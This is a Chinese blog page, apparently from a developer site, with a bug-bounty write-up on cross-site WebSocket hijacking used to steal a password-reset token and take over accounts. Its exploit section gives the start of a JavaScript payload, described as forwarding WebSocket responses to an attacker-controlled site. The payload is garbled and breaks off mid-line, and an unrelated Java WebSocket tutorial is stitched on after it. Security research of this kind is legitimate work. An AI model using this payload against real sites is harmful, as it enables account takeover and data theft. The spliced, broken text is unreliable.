url存在宽字节跨站漏洞_利用WebSocket跨站劫持(CSWH)漏洞接管帐户

0dcb43508dd7bdbd8c96d27ae8c969c3.png

在一次漏洞悬赏活动中,我发现了一个使用WebSocket连接的应用,所以我检查了WebSocket URL,发现它很容易受到CSWH的攻击(WebSocket跨站劫持)

有关CSWH的更多详细信息,可以访问以下链接了解

https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

首先,我们假设一个应用是通过以下URL建立websocket连接的 wss://website.com。关于验证URL是否存在CSWH漏洞可以遵循以下步骤:

  1. 在浏览器上打开Web应用并登录。
  2. 在新选项卡中输入http://websocket.org/echo.html,输入WebSocket URL并单击“连接”。
  3. 建立连接后,你必须能够从此页面向服务器发送数据帧。接着,使用burpsuite的proxy捕获websocket数据帧进行调试,多次发送,查看服务器如何响应。如果burp的回应和网页的回应一样,则表示目标很可能容易受到WebSocket跨站劫持的攻击
326df8f03980177ad9fea6a1f84dba5c.png

通过以上步骤,我确定应用存在CSWH漏洞。

一旦在新选项卡上建立了WebSocket连接,我就收到了下面的websocket响应

ede207c08e897be6a0b629657e71ae88.png

从上述响应中你可看到,参数“_forgotPasswordId”的值为“null”。

现在我需要“_forgotPasswordId”参数来发送恶意请求来重置密码。

58f19ff24cc7a6a499541b0d89232ad9.png

我再次测试了Websocket连接,这次观察到了如下回应,它包含一个forgetPasswordID令牌

07e4818cbd7c86372c4be5157d1dc8df.png

利用

现在准备CSWH漏洞的利用链,重置密码接管帐户。以下由HTML代码组成的payload会发送XHR请求,并把回应导向攻击者控制的站点。

 Testing var wsUri = "wss://host.com"; var output; function init() { output = document.getElementById("output"); testWebSocket(); } function testWebSocket() { websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt) }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.on error = function(evt) { on error(evt) }; } function onOpen(evt) { writeToScreen("CONNECTED"); doSend('websocket fr ame '); } function onClose(evt) { writeToScreen("DISCONNECTED"); } function onMessage(evt) {var xhr = new xm lHttpRequest();xhr.open("POST
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,下面是 Java 中 WebSocket 的学习教程: 1. WebSocket 概述 WebSocket 是一种在单个 TCP 连接上进行双向通信的协议。它可以让我们实现实时的 Web 应用程序,而不需要复杂的轮询或长轮询机制。 在 WebSocket 中,客户端和服务器之间可以发送任意数量的消息,并且这些消息都是异步发送和接收的。这使得 WebSocket 成为实现实时应用程序的理想选择。 2. WebSocket API Java 中的 WebSocket API 由以下类和接口组成: - `javax.websocket.Session`:代表一个 WebSocket 连接。 - `javax.websocket.Endpoint`:WebSocket 终端点,用于处理 WebSocket 连接和消息。 - `javax.websocket.MessageHandler`:用于处理 WebSocket 消息的接口。 - `javax.websocket.server.ServerEndpoint`:标注在 WebSocket 服务器端点类上,声明一个 WebSocket 服务端点。 - `javax.websocket.server.ServerEndpointConfig`:WebSocket 服务端点配置类,用于配置 WebSocket 服务器端点。 3. 实现 WebSocket 服务端 要实现一个 WebSocket 服务端,需要完成以下步骤: - 创建一个继承 `javax.websocket.Endpoint` 类的 WebSocket 终端点类。 - 在 WebSocket 终端点类中实现 `onOpen`、`onClose`、`onError` 和 `onMessage` 方法,用于处理 WebSocket 连接和消息。 - 使用 `@ServerEndpoint` 注解标注 WebSocket 终端点类,将其暴露为 WebSocket 服务端点。 下面是一个简单的 WebSocket 服务端实现示例: ```java @ServerEndpoint("/websocket") public class WebSocketServer { @OnOpen public void onOpen(Session session) { System.out.println("WebSocket opened: " + session.getId()); } @OnClose public void onClose(Session session) { System.out.println("WebSocket closed: " + session.getId()); } @OnError public void onError(Session session, Throwable error) { System.err.println("WebSocket error: " + error); } @OnMessage public void onMessage(String message, Session session) { System.out.println("WebSocket message received: " + message); try { session.getBasicRemote().sendText("Received message: " + message); } catch (IOException e) { e.printStackTrace(); } } } ``` 4. 实现 WebSocket 客户端 要实现一个 WebSocket 客户端,需要完成以下步骤: - 创建一个继承 `javax.websocket.Endpoint` 类的 WebSocket 终端点类。 - 在 WebSocket 终端点类中实现 `onOpen`、`onClose`、`onError` 和 `onMessage` 方法,用于处理 WebSocket 连接和消息。 - 使用 `javax.websocket.WebSocketContainer` 接口的 `connectToServer` 方法连接到 WebSocket 服务端点。 下面是一个简单的 WebSocket 客户端实现示例: ```java public class WebSocketClient extends Endpoint { @Override public void onOpen(Session session, EndpointConfig config) { System.out.println("WebSocket opened: " + session.getId()); try { session.getBasicRemote().sendText("Hello, server!"); } catch (IOException e) { e.printStackTrace(); } } @Override public void onClose(Session session, CloseReason closeReason) { System.out.println("WebSocket closed: " + session.getId()); } @Override public void onError(Session session, Throwable error) { System.err.println("WebSocket error: " + error); } @Override public void onMessage(String message, Session session) { System.out.println("WebSocket message received: " + message); try { session.close(); } catch (IOException e) { e.printStackTrace(); } } public static void main(String[] args) { WebSocketContainer container = ContainerProvider.getWebSocketContainer(); String uri = "ws://localhost:8080/websocket"; try { container.connectToServer(new WebSocketClient(), URI.create(uri)); } catch (DeploymentException | IOException e) { e.printStackTrace(); } } } ``` 5. 总结 这就是 Java 中 WebSocket 的学习教程,我们学习了如何实现 WebSocket 服务端和客户端,并使用 `javax.websocket` 包中的类和接口来处理 WebSocket 连接和消息。希望这个教程对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值